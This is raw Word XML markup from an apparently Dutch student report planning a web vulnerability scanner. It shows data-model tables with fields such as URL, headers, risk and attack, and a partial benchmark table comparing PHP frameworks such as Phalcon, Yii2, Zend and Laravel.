                            <w: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3"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H20D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B0PnS9h/JMZCD04+Sd3DRU/kH48CyQ5oeapJ0IT3RUGtqCw8XirAb8&#10;8Td/zCdZKcpZS/NYcP/9KFBxpr9aEjwO72DgYOwHwx7NGqjxCW2bk8mkBxj0YFYI5oVWZRWrUEhY&#10;SbUKHgZzHfqtoFWTarVKSTSiToQHu3UyQg8077oXge4iUiB5H2GYVJG/0arPTWq51TEQ8UnISGzP&#10;Ig1AvNB4p1G4rGLcn1/vKev1D2P5Ew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ah9tA4AgAAeAQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM/+Wg7hAAAACAEAAA8AAAAA&#10;AAAAAAAAAAAAkAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B992CF2" w14:textId="1DE9CE4C" w:rsidR="00E2204E" w:rsidRPr="00B2596E" w:rsidRDefault="00E2204E" w:rsidP="00F321B8">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.8</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39A2451"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p>
    <w:p w14:paraId="61B3B174" w14:textId="2B888D02" w:rsidR="007F1D35" w:rsidRDefault="00FF5975" w:rsidP="009C0970">
      <w:r>
        <w:t>De tabellen</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="87" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="000318EF" w14:paraId="79426709" w14:textId="77777777" w:rsidTr="0008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A1EE5E" w14:textId="7ABC87DD" w:rsidR="00DB141A" w:rsidRDefault="00DB141A" w:rsidP="001A61C4">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="20DF33FD" w14:textId="77777777" w:rsidTr="000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77AAC7" w14:textId="0D78797E" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="297E246B" w14:textId="77777777" w:rsidTr="000837C4">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDA4462" w14:textId="61D982AE" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6910" w:tblpY="-792"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="0EEE47C3"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CCE15B" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="511B563B"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43C64D" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Key (Sleutel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="3418C0BD"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20C8029B" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Value (waarde)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6910" w:tblpY="296"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="16826702" w14:textId="77777777" w:rsidTr="008C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A6B535" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="27838F58"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3B66669" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Module naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="247E64DC" w14:textId="77777777" w:rsidTr="008C2629">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D1EDFD8" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="55313D35"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EFFFB3" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="4BA82967" w14:textId="77777777" w:rsidTr="008C2629">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D060985" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="008C2629">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D8D540" w14:textId="77777777" w:rsidR="001A61C4" w:rsidRDefault="001A61C4" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="-13"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="76C52102"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37CD21" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="513A6397"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904882" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t xml:space="preserve">Methode </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="7A40A965"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480B72D1" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E75B8E5" w14:textId="77777777" w:rsidR="000318EF" w:rsidRDefault="000318EF" w:rsidP="001A61C4"/>
    <w:p w14:paraId="6054A0AA" w14:textId="77777777" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="279"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C179DA" w14:paraId="12327C0B"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F0732BE" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="22843299" w14:textId="77777777" w:rsidTr="00C179D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28" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35CD5D61" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C179DA" w14:paraId="44FFE911" w14:textId="77777777" w:rsidTr="00C179DA">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4495E1B0" w14:textId="77777777" w:rsidR="00C179DA" w:rsidRDefault="00C179DA" w:rsidP="00C179DA">
            <w:r>
              <w:t>Bestand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426797B8" w14:textId="77777777" w:rsidR="002748C4" w:rsidRDefault="002748C4" w:rsidP="002748C4"/>
    <w:p w14:paraId="2255C08D" w14:textId="77777777" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4"/>
    <w:p w14:paraId="065289AC" w14:textId="584A7334" w:rsidR="008A79F1" w:rsidRPr="00035572" w:rsidRDefault="008A79F1">
      <w:r w:rsidRPr="003E572F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584407D" w14:textId="38C1789C"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34E10"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534DB4">
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00A878AF" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1550D">
        <w:t>Technologie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375BA57C" w14:textId="77777777" w:rsidR="00316BA5" w:rsidRPr="00316BA5" w:rsidRDefault="00316BA5" w:rsidP="0095687C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA6F104" w14:textId="339F9375" w:rsidR="0095687C" w:rsidRPr="00486596" w:rsidRDefault="00330C02" w:rsidP="00330C02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5.1 </w:t>
      </w:r>
      <w:r w:rsidR="0070741F" w:rsidRPr="00486596">
        <w:t>Web Application Framework</w:t>
      </w:r>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5310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Phalcon</w:t>
      </w:r>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r>
        <w:t>Laravel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C74F2A" w14:textId="221BE7E7" w:rsidR="00486596" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Symfony</w:t>
      </w:r>
      <w:r w:rsidR="00E707BA">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B41C9" w14:textId="77777777" w:rsidR="00E915E4" w:rsidRDefault="00486596" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC69A9" w14:textId="1DA54CB1" w:rsidR="00A77292" w:rsidRDefault="00C003AB" w:rsidP="00A5093B">
      <w:r>
        <w:t>In tabel 3.7</w:t>
      </w:r>
      <w:r w:rsidR="003E5093">
        <w:t xml:space="preserve">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5310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>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BBF1A"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5310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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B94177" w:rsidRDefault="00D8697D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>PHP Framework Benchmark</w:t>
            </w:r>
            <w:r w:rsidR="005F32CD" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Gesorteerd op Performance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE3B92" w14:paraId="33A86F80" w14:textId="77777777" w:rsidTr="0069493A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBE755"/>
          </w:tcPr>
          <w:p w14:paraId="1F30F15E" w14:textId="096F2008" w:rsidR="00FE3B92" w:rsidRPr="00B94177" w:rsidRDefault="00FE3B92">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>JSON serialisatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="4434B5D4" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCA5EDC" w14:textId="16F5D33C" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00990F9C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A60432" w14:textId="1D3426B3" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00990F9C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
            <w:r w:rsidR="003E72A9" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (hoe hoger hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FBF00C" w14:textId="50A57D9C" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00D453C6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Wachtijd</w:t>
            </w:r>
            <w:r w:rsidR="003E72A9" w:rsidRPr="00B94177">
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (hoe lager hoe beter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="0A1A43EF" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35306C12" w14:textId="17551E6A" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001E5A83">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phalcon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DAEB127" w14:textId="3A633BA3" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="005D5E1E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>39,865 (7.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CEEB00" w14:textId="242634D1" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00F90C0F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>50.0 ms (3.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E72A9" w14:paraId="6FF7B9D5" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CACCEA3" w14:textId="377C96F5" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001E5A83">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Yii2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C80207F" w14:textId="33CCA03F" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="001D50E1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007E2397" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>,388 (1.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A6BADCF" w14:textId="0177B55A" w:rsidR="007D753D" w:rsidRPr="00B94177" w:rsidRDefault="00D84EEF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>27.1 ms (2.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="267E99A7" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA12634" w14:textId="3C763F36" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Zend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A435C3F" w14:textId="5067E5E1" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9,784 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0536E868" w14:textId="75881E85" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00013A6C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>31.1 ms (</w:t>
            </w:r>
            <w:r w:rsidR="00711493" w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>2.4%</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="31A9E726" w14:textId="77777777" w:rsidTr="00E707BA">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C92E8FE" w14:textId="2E0AA2DC" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Slim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B011D36" w14:textId="25E2085A" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9.640 (1.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CA584B" w14:textId="00DE2A97" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00711493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>34.3 ms (2.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="5E486259" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C953663" w14:textId="4AFFD1F9" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laravel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63544BEE" w14:textId="20C4DD01" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>7,020 (1.3%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F1CCBE" w14:textId="3BC766DB" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00711493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>38.0 ms (3.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267929" w14:paraId="2D981BF8" w14:textId="77777777" w:rsidTr="003E72A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB9370D" w14:textId="43F5354B" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B94177">
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Symfony 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B81E503" w14:textId="74BF9737" w:rsidR="00267929" w:rsidRPr="00B94177" w:rsidRDefault="00267929">
            <w:pPr>
              <w:rPr>
